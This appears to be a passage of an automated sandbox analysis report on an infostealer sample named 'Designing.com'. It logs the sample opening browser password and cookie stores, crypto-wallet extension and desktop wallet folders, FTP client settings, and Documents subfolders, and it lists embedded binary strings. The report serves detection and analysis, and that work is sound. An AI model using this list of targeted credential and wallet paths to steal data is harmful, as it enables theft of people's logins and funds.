                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Designing.comBinary or memory string: WIN_81
                Source: Designing.comBinary or memory string: WIN_XP
                Source: Brunette.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Designing.comBinary or memory string: WIN_XPe
                Source: Designing.comBinary or memory string: WIN_VISTA
                Source: Designing.comBinary or memory string: WIN_7
                Source: Designing.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\JDSOXXXWOAJump to behavior
